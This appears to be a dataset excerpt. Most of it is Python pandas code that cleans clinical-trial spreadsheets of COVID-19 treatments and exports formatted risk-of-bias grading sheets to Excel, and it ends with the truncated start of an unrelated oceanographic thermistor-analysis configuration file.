= df.copy()\n #n_trial = 7\n n_risk = 7\n \n if sheet == \"Trial characteristics\": #Sacar subdataframe the trial characteristics\n \n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n name_columns.append(f\"Intervention {n}\")\n\n except KeyError:\n break\n \n #for i in range(1, n):\n \n # name_columns.append(f\"Intervention {i}\")\n \n dfr = dfr[name_columns] \n \n for i in range(1, n):\n \n dfr.drop(f\"Intervention {i} description (dose, duration)\", axis = 1, level = 1, inplace = True)\n \n if f\"Intervention {i} description (dose, duration) revised\" in dfr.columns.get_level_values(1):\n \n dfr.drop(f\"Intervention {i} description (dose, duration) revised\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Dichotomous outcomes\":\n \n #dfr = dfr\n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Number of events\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Dichotomous outcomes-severity\":\n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Number of events\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Justfication\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Continuous outcomes\": \n \n dfr = dfr\n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Time to symptom resolution or time to clinical improvement criteria\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of variability\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Variability\", axis = 1, level = 1, inplace = True)\n \n if sheet == \"Continuous outcomes-severity\": \n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n dfr.drop(\"Follow-up time (days)\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Time to symptom resolution or time to clinical improvement criteria\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Central tendency\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Measure of variability\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Variability\", axis = 1, level = 1, inplace = True)\n dfr.drop(\"Justfication\", axis = 1, level = 1, inplace = True)\n\n if sheet == \"Risk of bias\": #saca subdate de risk of bias\n \n dfr.drop(\"Comments\", axis = 1, level = 0, inplace = True)\n for i in range(1, n_risk):\n \n dfr.drop(f\"Domain {i} justification\", axis = 1, level = 1, inplace = True)\n #dfr.drop('6) Other biases (e.g., competing risks)', axis = 1, level = 1, inplace = True)\n \n return dfr\n\n\ndef check_spelling_manually_lol(lst): #a falta de opciones mejores para spellcheck, y que no hay tantas faltas de ortografia, hacemos spellcheck manualmente\n \n n = len(lst)\n \n for m in range(0, n):\n \n lst[m] = \"\".join(lst[m].rstrip())\n name =lst[m]\n \n \n if name == \"α-lipoic acid\":\n \n lst[m] = \"alpha lipoic acid\"\n \n #if name == \"hydoxychloroquine\" or name == \"Hydroxychloroquine\" or name == \"(hydroxy)chloroquine\":\n if \"y)chloroquine\" in name:\n #print(name)\n lst[m] = \"hydroxychloroquine\"\n \n if \"ychloroquine\" in name:\n #print(name)\n lst[m] = \"hydroxychloroquine\"\n \n if name == \"nano-curcumin\":\n \n lst[m] = \"nanocurcumin\"\n \n if name == \"usual care\" or name == \"control\" or name == \"Placebo\" or name == \"Standard care\":\n \n lst[m] = \"standard care/placebo\"\n \n return lst\n \n\ndef treat_list_grouping(lst, adverse_events = False): #esta funcion agrupa de acuerdo a las directrices que nos mandan\n \n n = len(lst)\n \n for m in range(0, n):\n \n lst[m] = \"\".join(lst[m].rstrip())\n name =lst[m]\n \n if name == \"siltuximab\" or name == \"tocilizumab\":\n \n lst[m] = \"IL6 receptor antagonists\"\n \n if name == \"placebo\" or name == \"standard care\":\n \n lst[m] = \"standard care/placebo\"\n \n if name == \"dexamethasone\" or name == \"methylprednisolone\":\n \n lst[m] = \"corticosteroids\"\n \n if adverse_events == False: #Para la pestaña de efectos adversos necesitamos dejar separado las cloroquinas \n \n if name == \"chloroquine\":\n \n lst[m] = \"hydroxychloroquine\"\n \n if \"nterferon\" in name:\n \n if \"inhaled nebulised\" not in name:\n \n lst[m] = lst[m].replace(\"-\", \" \")\n lst[m] = lst[m][0].lower() + lst[m][1:]\n aux_list = lst[m].split()\n index = [idx for idx, s in enumerate(aux_list) if 'nterferon' in s][0]\n \n if (index + 1) < len(aux_list):\n lst[m] = ' '.join(aux_list[index:index + 2])\n \n else:\n lst[m] = ' '.join(aux_list)\n\n return lst\n\n \ndef clean_treatments_names(df, sheet = \"Trial characteristics\", adverse_events = False, directory_file = 0): \n #esta funcion limpia, con ayuda de treat_list_grouping, \n #los nombres de los tratamientos, ignorando dias y dosis y ordenando los elementos\n dfr=df.copy()\n #n_trial = 7\n \n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n \n if n == 1:\n n=2\n \n for i in range(1, n): #Check all cells of names\n \n for j in range(0, len(dfr.index)):\n #revisamos una celda\n if sheet == \"Trial characteristics\":\n \n aux_str = dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")]\n \n elif sheet == \"Dichotomous outcomes\" or sheet == \"Dichotomous outcomes-severity\":\n \n aux_str = dfr.loc[j, (\"Intervention name\", \"Intervention name\")]\n \n elif sheet == \"Continuous outcomes\" or sheet == \"Continuous outcomes-severity\":\n \n aux_str = dfr.loc[j, (\"Intervention name\", \"Intervention name\")]\n #print(aux_str)\n \n if type(aux_str) == str: #vemos solo los strings\n \n aux_str = re.sub(r\"\\([^)]*\\)\", \"\", aux_str) #esto quita los parentesis\n #aux_str = aux_str[0].lower() + aux_str[1:]\n aux_str = aux_str.strip()\n aux_list = aux_str.split(\", \")\n #aqui va el combinador para entender distintas categorias como una, \n aux_list = check_spelling_manually_lol(aux_list) #como placebo y standard care, en la forma de placebo/standard care\n \n if type(directory_file) != int:\n \n aux_list.sort()\n \n aux_str = \", \".join(aux_list)\n \n if aux_str == \"chloroquine\" or aux_str == \"hydroxychloroquine\":\n \n if adverse_events == False:\n \n aux_str = \"hydroxychloroquine\"\n \n else:\n \n aux_str = aux_str\n \n else:\n \n index_node_list = directory_file.loc[directory_file.isin([aux_str]).any(axis=1)].index.tolist()\n \n if len(index_node_list) == 0:\n\n aux_str = aux_str\n \n else:\n \n index_node = index_node_list[0]\n aux_str = directory_file.loc[index_node,\"Node\"]\n \n aux_list = aux_str.split(\", \")\n \n aux_list = treat_list_grouping(aux_list, adverse_events)\n \n aux_list.sort()\n #reconstruye el string\n if sheet == \"Trial characteristics\":\n \n dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")] = \", \".join(aux_list)\n \n elif sheet == \"Dichotomous outcomes\" or sheet == \"Dichotomous outcomes-severity\":\n \n dfr.loc[j, (\"Intervention name\", \"Intervention name\")] = \", \".join(aux_list)\n \n elif sheet == \"Continuous outcomes\" or sheet == \"Continuous outcomes-severity\":\n \n dfr.loc[j, (\"Intervention name\", \"Intervention name\")] = \", \".join(aux_list)\n\n return dfr\n \n\ndef id_order(df): #ordena RefId de forma que si tiene varios strings, los ordena con sort() de forma que todo salga igual\n \n dfr = df.copy()\n \n for i in range(0, len(dfr.index)):\n \n dfr.iloc[i, 0] = str(dfr.iloc[i, 0])\n aux_list = dfr.iloc[i, 0].split(\", \") #necesito el auxiliar ya que sin el no hace el sort()\n aux_list.sort()\n dfr.iloc[i, 0] = \", \".join(aux_list)\n\n return dfr\n\n\n\ndef treatmentsv2(df): #funcion auxiliar para obtener una lista de los medicamentos en un solo dataframe con nombre y numero\n \n dfr = df.copy()\n srs = pd.DataFrame()\n #n_trial = 7\n \n for n in range(1, 20):\n #print(n)\n try:\n aux=dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n\n \n for i in range(1, n): \n \n aux = dfr.loc[:, f\"Intervention {i}\"]\n aux = aux.rename(columns = { f\"Intervention {i} name\" : \"name\", \"N randomized\" : \"N\"})\n srs = pd.concat([srs, aux], ignore_index = True, axis = 0)\n \n srs.dropna(inplace = True)\n srs.reset_index(inplace = True, drop = True)\n \n return srs\n\n\n\ndef duplicated_in_study(df, sheet = \"Trial characteristics\"): #Despues de limpiar todo, algunas columnas se repiten dado que quitamos dosis y dias\n \n dfr = df.copy()\n #n_trial = 7\n \n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n \n for i in range(1, n):\n \n dfr[(f\"Intervention {i}\", f\"Intervention {i} name\")].replace(\"NR\", np.nan, inplace = True)\n \n for j in range(0, len(dfr.index)): #En todas las filas, revisamos si se repiten los nombres de tratamientos\n \n aux_list = []\n \n for i in range(1, n): #checar si se repiten los nombres\n \n cell = dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")]\n \n if pd.isna(cell) == False and type(cell) == str: #solo nos preocupamos en celdas no vacias\n \n if cell not in aux_list: #si el nombre no esta en la lista, la agregamos\n \n aux_list.append(cell)\n \n else: #si esta en la lista, encontramos en que celda y sumamos el numero de pacientes a la celda correspondiente\n \n index_of_column = list(dfr.loc[j, :]).index(cell)\n dfr.iloc[j, index_of_column +1] += dfr.loc[j, (f\"Intervention {i}\", \"N randomized\")]\n #borramos el nombre y cantidad que se repiten, dado que ya lo sumamos\n dfr.loc[j, (f\"Intervention {i}\", f\"Intervention {i} name\")] = float(\"NaN\")\n dfr.loc[j, (f\"Intervention {i}\", \"N randomized\")] = float(\"NaN\")\n\n return dfr\n\n\ndef cross_treatments(df): #saca nuevas filas relacionando diferentes intervenciones dentro del mismo estudio\n \n the_columns = [\"Treatment 1\", \"Treatment 2\", \"Ref ID\", \"1st Author\", \"Total N\"]\n dfr = pd.DataFrame(columns = the_columns)\n #n_trial = 7\n\n for n in range(1, 20):\n #print(n)\n try:\n dfr[\"Intervention {}\".format(n)]\n except KeyError:\n break\n \n for i in range(0, len(df.index)):\n \n for j in range(1, n):\n \n cell1 = df.loc[i, (f\"Intervention {j}\", f\"Intervention {j} name\")]\n num1 = df.loc[i, (f\"Intervention {j}\", \"N randomized\")]\n \n if pd.isna(cell1) == False:\n \n for k in range(j+1, n):\n \n cell2 = df.loc[i, (f\"Intervention {k}\", f\"Intervention {k} name\")]\n num2 = df.loc[i, (f\"Intervention {k}\", \"N randomized\")]\n \n if pd.isna(cell2) == False:\n \n row_to_append = pd.DataFrame(index =[0], columns = the_columns) \n \n aux_string = df.loc[i, (\"Ref ID\", \"Ref ID\")]\n row_to_append.loc[0, \"Ref ID\"] = aux_string\n\n aux_string = df.loc[i, (\"1st Author\", \"1st Author\")]\n row_to_append.loc[0, \"1st Author\"] = aux_string\n \n if pd.isna(num1) == True or type(num1) == str:\n \n df.loc[i, (f\"Intervention {j}\", \"N randomized\")] = 0\n \n if pd.isna(num2) == True or type(num2) == str:\n \n df.loc[i, (f\"Intervention {k}\", \"N randomized\")] = 0\n \n total_patients = df.loc[i, (f\"Intervention {j}\", \"N randomized\")] + \\\n df.loc[i, (f\"Intervention {k}\", \"N randomized\")] #int(filter(str.isdigit, num1)) + int(filter(str.isdigit, num2))\n row_to_append.loc[0, \"Total N\"] = total_patients\n \n if (cell1 != \"standard care/placebo\" and cell1 != \"placebo/standard care\") and (cell2 != \"standard care/placebo\" and cell2 != \"placebo/standard care\"):\n \n sorting_list = [str(cell1), str(cell2)]\n sorting_list.sort()\n \n row_to_append.loc[0, \"Treatment 1\"] = sorting_list[0]\n row_to_append.loc[0, \"Treatment 2\"] = sorting_list[1]\n \n else:\n \n if cell2 == \"standard care/placebo\" or cell2 == \"placebo/standard care\":\n \n row_to_append.loc[0, \"Treatment 1\"] = cell1\n row_to_append.loc[0, \"Treatment 2\"] = cell2\n \n else:\n \n row_to_append.loc[0, \"Treatment 1\"] = cell2\n row_to_append.loc[0, \"Treatment 2\"] = cell1\n \n dfr = dfr.append(row_to_append, ignore_index = True)\n\n return dfr\n\ndef order_treatments_on_2_columns(df):\n \n df.reset_index(inplace = True, drop = True)\n dfr = df.copy()\n treatments1 = 'Intervention name_x'\n treatments2 = 'Intervention name_y'\n #N1 = 'Total N_x'\n #N2 = 'Total N_y'\n \n for i in range(0, len(df.index)):\n \n cell1 = df.loc[i, treatments1]\n #num1 = df.loc[i, N1]\n \n cell2 = df.loc[i, treatments2]\n #num2 = df.loc[i, N2]\n \n if (cell1 != \"standard care/placebo\" and cell1 != \"placebo/standard care\") and (cell2 != \"standard care/placebo\" and cell2 != \"placebo/standard care\"):\n \n sorting_list = [str(cell1), str(cell2)]\n sorting_list.sort()\n \n dfr.loc[i, treatments1] = sorting_list[0]\n dfr.loc[i, treatments2] = sorting_list[1]\n \n else:\n \n if cell2 == \"standard care/placebo\" or cell2 == \"placebo/standard care\":\n \n dfr.loc[i, treatments1] = cell1\n dfr.loc[i, treatments2] = cell2 \n \n else:\n \n dfr.loc[i, treatments1] = cell2\n dfr.loc[i, treatments2] = cell1\n \n dfr[\"Total N\"] = dfr[\"Total N_x\"] + dfr[\"Total N_y\"]\n\n return dfr\n\n#get the merge of RoB and one of the other sheets, COnt or Dich\ndef get_partial(dfRoB, dfOut, dich_or_cont):\n \n partial_id = pd.merge(dfRoB, dfOut, on = [\"Ref ID\", dich_or_cont])\n partial_id.drop([\"1st Author_y\"], axis = 1, inplace = True)\n partial_id.rename(columns = {\"1st Author_x\" : \"1st Author\"}, inplace = True)\n \n partial_author = pd.merge(dfRoB, dfOut, on = [\"1st Author\", dich_or_cont])\n partial_author.drop([\"Ref ID_y\"], axis = 1, inplace = True)\n partial_author.rename(columns = {\"Ref ID_x\" : \"Ref ID\"}, inplace = True)\n \n partial = pd.concat([partial_id, partial_author], axis = 0)\n partial.drop_duplicates(subset = partial.columns[1:].tolist(), inplace = True)\n partial.drop_duplicates(subset = partial.columns[0:1].tolist() + \\\n partial.columns[2:].tolist(), inplace = True)\n \n return partial\n\n\n#this function takes both partial merges and vomits the df we need\ndef literally_a_black_box_that_gets_us_what_we_need_lol(df1, df2):\n \n column_order = [\"Treatment 1\", \"Treatment 2\", \"Ref ID\", \"1st Author\", \"Total N\", \"1) Bias arising from the randomization process\", \\\n \"2) Bias due to deviations from the intended intervention\", \"3) Bias due to missing outcome data\", \\\n \"4) Bias in measurement of the outcome\", \"5) Bias in selection of the reported results\", \\\n \"6) Other biases (e.g., competing risks)\", \"Dichotomous Outcome\", \"Continuous Outcome\"]\n\n inner_join_precursors = pd.concat([df1, df2], axis = 0)\n inner_join_precursors.rename(columns = {\"N analyzed\" : \"Total N\"}, inplace = True)\n inner_join_precursors.reset_index(inplace = True, drop = True)\n\n inner_join_precursors = pd.merge(inner_join_precursors, inner_join_precursors, on = inner_join_precursors.columns.values[0:10].tolist())\n inner_join_precursors.drop(inner_join_precursors[inner_join_precursors['Intervention name_x'] == inner_join_precursors['Intervention name_y']].index, inplace = True)\n\n inner_join_precursors = order_treatments_on_2_columns(inner_join_precursors)\n inner_join_precursors.drop([\"Total N_x\", \"Total N_y\"], axis = 1, inplace = True)\n inner_join_precursors = inner_join_precursors[inner_join_precursors.duplicated()] \n inner_join_precursors.reset_index(inplace = True, drop = True)\n inner_join_precursors.rename(columns = {\"Intervention name_x\" : \"Treatment 1\", \"Intervention name_y\" : \"Treatment 2\"}, inplace = True)\n inner_join_precursors = inner_join_precursors[column_order]\n \n \n return inner_join_precursors\n\ndef get_outcomes_ready(df, sheet, adverse_events = False, directory_file = 0, total_nan = False):\n \n dfr = find_int_in_string(id_order(subdf(clean_treatments_names(cleandf(df, total_nan = False), sheet = sheet, directory_file = directory_file), sheet)), start_column = 3, end_column = 4)\n dfr.columns = dfr.columns.get_level_values(1) \n dfr = dfr.groupby([\"Ref ID\", \"1st Author\", \"Intervention name\", \"Outcome\"], as_index = False)[\"N analyzed\"].agg(lambda x: x.sum())\n \n return dfr\n\n#variation of past function for when we can discriminate by severity\ndef get_outcomes_ready_severity(df, sheet, adverse_events = False, directory_file = 0, total_nan = False):\n \n dfr = find_int_in_string(id_order(subdf(clean_treatments_names(cleandf(df, total_nan = False), sheet = sheet, directory_file = directory_file), sheet)), start_column = 3, end_column = 5)\n dfr.columns = dfr.columns.get_level_values(1) \n dfr = dfr.groupby([\"Ref ID\", \"1st Author\", \"Intervention name\", \"Outcome\", \"Severe\"], as_index = False)[\"N analyzed\"].agg(lambda x: x.sum())\n \n return dfr\n \ndef get_trial_characteristics_ready(df, sheet, adverse_events = False, directory_file = 0, total_nan = False): #aglomerado para sacar el gradeing\n \n \n dfr = cross_treatments(duplicated_in_study(id_order(subdf(clean_treatments_names(cleandf(df, total_nan = total_nan), adverse_events = adverse_events, directory_file = directory_file), sheet))))\n\n return dfr\n\n\ndef get_risk_of_bias_ready(df, sheet, total_nan = False): #aglomerado para sacar el gradeing 2\n \n dfr = id_order(subdf(cleandf(df, total_nan = total_nan), sheet))\n dfr.columns = dfr.columns.get_level_values(1) #Flattens multicolumns\n \n return dfr\n\n#difference between old and new data archives, to find \"# new treatment column\"\n\ndef differences_on_new_doc(df_old, df_new):\n \n if type(df_old) != int:\n df = pd.concat([df_old, df_new])\n \n df = df[[\"Treatment 1\", \"Treatment 2\", \"1st Author\", \"Dichotomous Outcome\", \"Continuous Outcome\"]]\n\n df = df.drop_duplicates(keep = False)\n\n df = df[[\"Treatment 1\", \"Treatment 2\", \"Dichotomous Outcome\", \"Continuous Outcome\"]]\n \n else:\n \n df = df_new.copy()\n df = df[[\"Treatment 1\", \"Treatment 2\", \"Dichotomous Outcome\", \"Continuous Outcome\"]]\n \n return df\n\ndef number_of_new_treatments_column(df_old, df_new):\n \n df = differences_on_new_doc(df_old, df_new)\n\n #count the amount of treatment convinations that are new between gradeing studies\n\n new_treatments_number = df.value_counts(dropna = False).reset_index()\n new_treatments_number.rename(columns = {0 : \"# of new trials\"}, inplace = True)\n\n # finally gets the dataframe ready to export in an excel, ready for formatting\n\n inner_join_precursors = pd.merge(df_new, new_treatments_number, how = 'left', on = [\"Treatment 1\", \"Treatment 2\", \"Dichotomous Outcome\", \"Continuous Outcome\"])\n\n inner_join_precursors[\"# of new trials\"].fillna(value = 0, inplace = True)\n\n #change column of number of new trials of place and group by treatment combination\n\n new_trials_column = inner_join_precursors.pop(\"# of new trials\") \n inner_join_precursors.insert(2, \"# of new trials\", new_trials_column) \n inner_join_precursors.sort_values(by = [\"Treatment 1\", \"Treatment 2\"], inplace = True)\n \n return inner_join_precursors\n \n#finds integers wrongly captured as strings and makes them integers again\n \ndef find_int_in_string(df, start_column = 0, end_column = 1):\n \n dfr = df.copy()\n \n for i in range(0, len(df.index)):\n \n for j in range(start_column, end_column + 1):\n \n cell = dfr.iloc[i, j]\n \n if type(cell) == str:\n \n if any(c.isdigit() for c in cell):\n \n dfr.iloc[i, j] = int(re.sub(\"\\D\", \"\", df.iloc[i, j]))\n \n else:\n \n dfr.iloc[i, j] = np.nan\n \n return dfr \n\n#this function isnt used\ndef subheaders_treatments(df):\n \n dfr = df.copy()\n \n treatment_title = (\"\", \"\")\n \n #treatment_headers = pd.DataFrame().reindex(columns=dfr.columns)\n \n for i in range(0, len(df.index)):\n \n if (dfr.iloc[i, 0], dfr.iloc[i, 1]) != treatment_title:\n \n treatment_title = (dfr.iloc[i, 0], dfr.iloc[i, 1])\n \n else:\n \n pass\n \n# call this function to style the risk of bias background colors\n#not used\ndef risk_of_bias_styler(cell):\n \n if cell == \"low risk of bias\":\n \n color = \"#70ad47\"\n \n elif cell == \"probably low risk of bias\":\n \n color = \"yellow\"\n \n elif cell == \"probably high risk of bias\":\n \n color = \"#ed7d31\"\n \n elif cell == \"either probably low or probably high risk of bias\":\n \n color = \"#ed7d31\"\n \n elif cell == \"high risk of bias\":\n \n color = \"red\"\n\n return 'background-color: %s' % color \n\n#insert columns for future data we may want to include, but for now it is empty\n\ndef insert_empty_columns(df, n_column):\n \n df.insert(n_column, \"Characteristic 5\", \"\")\n df.insert(n_column, \"Characteristic 4\", \"\")\n df.insert(n_column, \"Characteristic 3\", \"\")\n df.insert(n_column, \"Characteristic 2\", \"\") \n \n#change the names of the dataframe\ndef correct_column_naming(df):\n \n df.rename(columns = {\"Ref ID\" : \"Trial\", \"1st Author\" : \"First author\", \"Total N\" : \"N\", \\\n '1) Bias arising from the randomization process' : \"Randomization\", \\\n '2) Bias due to deviations from the intended intervention' : \"Deviations from the intended\\nintervention\", \\\n '3) Bias due to missing outcome data' : \"Missing outcome data\", \\\n '4) Bias in measurement of the outcome' : \"Measurement of outcome\", \\\n '5) Bias in selection of the reported results' : \"Selection of the reported\\nresults\", \\\n '6) Other biases (e.g., competing risks)' : \"Other\"}, inplace = True)\n \n#like the last function, but for the dataframe of the merge of dichotomous + continuous and RoB\ndef correct_column_naming_Outcomes(df):\n \n df.rename(columns = {\"Ref ID\" : \"Trial\", \"1st Author\" : \"First author\", \"Total N\" : \"N\", \\\n '1) Bias arising from the randomization process' : \"Randomization\", \\\n '2) Bias due to deviations from the intended intervention' : \"Deviations from the intended\\nintervention\", \\\n '3) Bias due to missing outcome data' : \"Missing outcome data\", \\\n '4) Bias in measurement of the outcome' : \"Measurement of outcome\", \\\n '5) Bias in selection of the reported results' : \"Selection of the reported\\nresults\"}, inplace = True)\n\n\n# Instead of a simple merge, we use this to get what we need, merging by the ID\n#In the future we could \"merge\" using the union of both a 1st author merge and a ID merge\n\ndef pdmerge_id(df1, df2, on = [\"Ref ID\"]):\n \n inner_join_precursors_id = pd.merge(df1, df2, on = on)\n inner_join_precursors_id.drop([\"1st Author_y\"], axis = 1, inplace = True)\n inner_join_precursors_id.rename(columns = {\"1st Author_x\" : \"1st Author\"}, inplace = True)\n\n return inner_join_precursors_id \n\n#aux function to insert empty row \ndef insert_empty_row(x):\n x.loc[-1] = pd.Series([])\n return x\n\n#creates the dataframe for the sheets\n\ndef gradeing_sheet_parse(df, dichotomous_or_continuous, n_outcome):\n \n dfr = df.copy()\n \n dfr = dfr[dfr[dichotomous_or_continuous] == n_outcome]\n dfr = dfr.drop([\"Dichotomous Outcome\", \"Continuous Outcome\"], axis = 1)\n dfr.reset_index(drop=True, inplace=True)\n \n #this part does the grouped by treatments part\n \n treatments_groups = dfr.groupby([\"Treatment 1\", \"Treatment 2\", \"# of new trials\"], \\\n as_index = False)[\"N\"].sum()\n \n dfr = pd.concat([treatments_groups, dfr], axis = 0)\n \n if dichotomous_or_continuous == \"Continuous Outcome\":\n \n dfr = dfr[['Treatment 1', 'Treatment 2', '# of new trials', 'Trial', \\\n 'First author', 'N', 'Characteristic 2', 'Characteristic 3', \\\n 'Characteristic 4', 'Characteristic 5', 'Randomization', \\\n 'Deviations from the intended\\nintervention', 'Missing outcome data', \\\n 'Measurement of outcome', 'Selection of the reported\\nresults', 'Other']]\n \n else:\n \n dfr = dfr[['Treatment 1', 'Treatment 2', '# of new trials', 'Trial', \\\n 'First author', 'N', 'Characteristic 2', 'Characteristic 3', \\\n 'Characteristic 4', 'Characteristic 5', 'Randomization', \\\n 'Deviations from the intended\\nintervention', 'Missing outcome data', \\\n 'Measurement of outcome', 'Selection of the reported\\nresults']]\n \n dfr.sort_values(by = [\"Treatment 1\", \"Treatment 2\"], inplace = True)\n dfr.reset_index(drop=True, inplace=True)\n \n #insert empty rows as the format indicates\n dfr = dfr.groupby(['Treatment 1', 'Treatment 2'], as_index=False).apply(insert_empty_row)\n dfr.reset_index(drop=True, inplace=True)\n \n for i in range(0, len(dfr.index)):\n #print(dfr.loc[i, \"Trial\"])\n if type(dfr.loc[i, \"First author\"]) == str:\n \n dfr.loc[i, \"Treatment 1\"] = np.nan\n dfr.loc[i, \"Treatment 2\"] = np.nan\n dfr.loc[i, \"# of new trials\"] = np.nan\n \n return dfr\n\n#replaces the number coding into the corresponding wording\n \ndef convert_bias_from_numbers(df):\n \n dfr = df.copy()\n \n columns = [\"Randomization\", \"Deviations from the intended\\nintervention\", \"Missing outcome data\", \\\n \"Measurement of outcome\", \"Selection of the reported\\nresults\", \"Other\"]\n \n dfr[columns] = dfr[columns].mask(dfr == 1, \"low risk of bias\", try_cast = True)\n dfr[columns] = dfr[columns].mask(dfr == 2, \"probably low risk of bias\", try_cast = True)\n dfr[columns] = dfr[columns].mask(dfr == 3, \"probably high risk of bias\", try_cast = True)\n dfr[columns] = dfr[columns].mask(dfr == 4, \"high risk of bias\", try_cast = True)\n dfr[columns] = dfr[columns].mask(dfr == 23, \"either probably low or probably high risk of bias\", try_cast = True)\n \n return dfr\n\ndef export_df_to_gradeing_sheet(df, writer, sheet_name = \"unamed\", name_excel = \"unamed gradeing\"):\n\n #writer = pd.ExcelWriter(name_excel, engine='xlsxwriter')\n #dfr = df.copy()\n df.to_excel(writer, sheet_name = sheet_name, index = False, startrow = 1)\n\n #create book and sheet\n workbook = writer.book\n worksheet = writer.sheets[sheet_name] # pull worksheet \n \n #hide columns without characteristics atm\n \n worksheet.set_column('G:J', None, None, {'hidden': True})\n\n rows = len(df.index)\n #formats\n #column width\n format_center = workbook.add_format({'align': 'center', 'valign': 'top'})\n #set widt and alignment of all the columns\n\n worksheet.set_column(0, 1, 30, format_center)\n worksheet.set_column(2, 3, 13, format_center)\n worksheet.set_column(4, 4, 20, format_center)\n worksheet.set_column(5, 5, 10, format_center)\n worksheet.set_column(10, 15, 25, format_center)\n \n #set title color\n \n treatment_header = workbook.add_format({'align': 'center', 'valign': 'top'})\n treatment_header.set_bg_color('#d9e2f3')\n \n if sheet_name != \"Notes\":\n \n for i in range(0, len(df.index)):\n \n if type(df.loc[i, \"Treatment 1\"]) == str:\n \n worksheet.set_row(i + 2, 15, treatment_header)\n\n #conditional format\n RoB_low_risk = workbook.add_format()\n RoB_low_risk.set_bg_color('#70ad47')\n\n RoB_prob_low_risk = workbook.add_format()\n RoB_prob_low_risk.set_bg_color('yellow')\n\n RoB_prob_high_risk = workbook.add_format()\n RoB_prob_high_risk.set_bg_color('#ed7d31')\n\n RoB_high_risk = workbook.add_format()\n RoB_high_risk.set_bg_color('red')\n \n format3 = workbook.add_format()\n\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'blanks',\n 'stop_if_true': True,\n 'format': format3})\n \n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'low risk of bias',\n 'format': RoB_low_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'probably low risk of bias',\n 'format': RoB_prob_low_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'probably high risk of bias',\n 'format': RoB_prob_high_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'either probably low or probably high risk of bias',\n 'format': RoB_prob_high_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'high risk of bias',\n 'format': RoB_high_risk}) \n worksheet.set_zoom(90)\n\n\"\"\"Functions for the second task\"\"\"","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":38084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218005563","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 14:51:55 2013\n\n@author: cimatori\n\"\"\"\n\n# 1. General\n# Data path\nfrom socket import gethostname\nif gethostname()=='sboron2':\n BaseDir = '/run/media/sambarluc/Cimatoribus1/Analyses/LIS131/'\nelse:\n BaseDir = '/media/scratch/Analyses/LIS131/'\n#Output directory\nOutDir = BaseDir+'TemperatureDissipation/'\n# Data dir\nDetailFile = BaseDir+'ProcessData/results/Output_data_stex.chn'\n\n# Get data from these dates\nStart = 104.\nEnd = 224.\n#Start = 155.0\n#End = 165.0\n\n# Pass band in sec\nBP = 1500\n# Stop band\nBS = 5600\n\n# Which increments to compute?\n#dTs = [2**i for i in range(12)]\nfrom numpy import unique,int32,around,logspace\ndTs = unique(int32(logspace(0,20,40, base=1.5)))\nndTs = len(dTs)\n\n# How many points of cdf do we want to keep?\nnCDF = 1e3\n\n# Step of spatial series of temperature (m)\nStepX = 0.2\n\n# File containing taylor converted data\nTaylorFile = 'results/Taylor_StepX_{}_day_{}_{}.hdf'.format(StepX,Start,End)\n\n# Which thermistor sets should be computed?\nsets = ['73-108','109-144']\n#sets = ['1-36','37-72']\n\n# Order of moments to compute\nMoms = range(1,11)\nnM = len(Moms)\n\nsetNames = ('1-36','37-72','73-108','109-144')\nnSets = len(setNames)\nsetLabels = dict(zip(setNames,('A','B','C','D')))\nsetThms = dict(zip(setNames,(range(0,36),range(36,72),range(72,108),range(108,144))))\n\nsetName = ['{}'.format(setLabels[sn]) for sn in sets]\nsetName = ''.join(setName)\n\n# Style of bar plots\nbStyle = dict(ls='-', lw=1.5, alpha=0.9)\n# Style for point plots\npStyle = dict(ms=6, alpha=0.8, mew=1.2, ls='none')\n# Style for fill_between plots\nfStyle = dict(alpha=0.2, lw=1.)\n\n# Markers for tidal phases\nmarkT = ('^','o')\nnamT = ('up', 'down')\ncolorsT = ('b','r')\n\n# Number of tidal phases\nnT = len(namT)\n\n# File where to save results\nOutFile = OutDir+'results/Moments_{}_BS_{}_BP_{}_day_{}_{}.npz' \\\n .format(setName,BS,BP,Start,End)\nOutFileNoF = 